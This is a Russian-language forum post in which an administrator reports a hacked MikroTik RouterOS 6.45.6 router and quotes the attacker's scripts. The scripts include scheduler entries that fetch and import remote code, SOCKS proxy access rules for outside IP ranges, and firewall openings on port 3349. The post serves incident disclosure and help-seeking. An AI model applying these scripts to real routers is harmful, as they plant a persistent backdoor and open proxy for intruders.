Чтобы поделиться, вчера мы обнаружили, что один из публичных Mikrotik был взломан. Мы не думаем, что пароль утек, скорее всего, это было через какую-то уязвимость. Вот детали: Модель: Routerboard 3011UiAS (CloudCore) Версия ОС: 6.45.6 IP-сервисы: только Winbox доступен из внутреннего диапазона сети Что сделал хакер: добавил 2 скрипта в файловую систему под именем: 7wmp0b4s.rsc ================= :do { /system scheduler set U3 name=“U7” on-event=“/tool fetch url= mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08” } on-error={ :put “U3 не найден”} :do { /system scheduler set U4 name=“U7” on-event=“/tool fetch url= mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08” } on-error={ :put “U4 не найден”} :do { /system scheduler set U5 name=“U7” on-event=“/tool fetch url= mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08” } on-error={ :put “U5 не найден”} :do { /system scheduler set U6 name=“U7” on-event=“/tool fetch url= mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08” } on-error={ :put “U6 не найден”} :do { /system scheduler set U7 name=“U7” on-event=“/tool fetch url= mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08” } on-error={ :put “U7 не найден”} имя: 7xe7zt46hb08 /ip socks access add src-address=5.188.42.0/24 action=allow /ip socks access add src-address=85.119.151.0/24 action=allow /ip socks access add src-address=77.238.240.0/24 action=allow /ip socks access add src-address=178.239.168.0/24 action=allow /ip socks access add src-address=77.238.228.0/24 action=allow /ip socks access add src-address=94.243.168.0/24 action=allow /ip socks access add src-address=213.33.214.0/24 action=allow /ip socks access add src-address=5.188.187.0/24 action=allow /ip socks access add src-address=31.172.128.45/32 action=allow /ip socks access add src-address=31.172.128.25/32 action=allow /ip socks access add src-address=10.0.0.0/8 action=allow /ip socks access add src-address=185.137.233.251/32 action=allow /ip socks access add src-address=5.9.163.16/29 action=allow /ip socks access add src-address=95.213.221.0/24 action=allow /ip socks access add src-address=159.255.24.0/24 action=allow /ip socks access add src-address=31.184.210.0/24 action=allow /ip socks access add src-address=192.243.53.0/24 action=allow /ip socks access add src-address=146.0.78.6/32 action=allow /ip socks access add src-address=193.188.22.205/32 action=allow /ip socks access add src-address=0.0.0.0/0 action=deny Настроить выполнение задачи каждый час. Добавить следующее в правила файрвола: add action=accept chain=input dst-port=3349 protocol=tcp add action=accept chain=input dst-port=3349 protocol=tcp add action=accept chain=input dst-port=3349 protocol=tcp add action=accept chain=input dst-port=3349 protocol=tcp Спасибо. С уважением, Джош.
Mikrotik OS 6.45.6 взломан
Mikrotik OS 6.45.6 взломан, RouterOS
|
26.02.2020 04:35:00
|
|
|
|
|
Читают тему

Извините за беспокойство.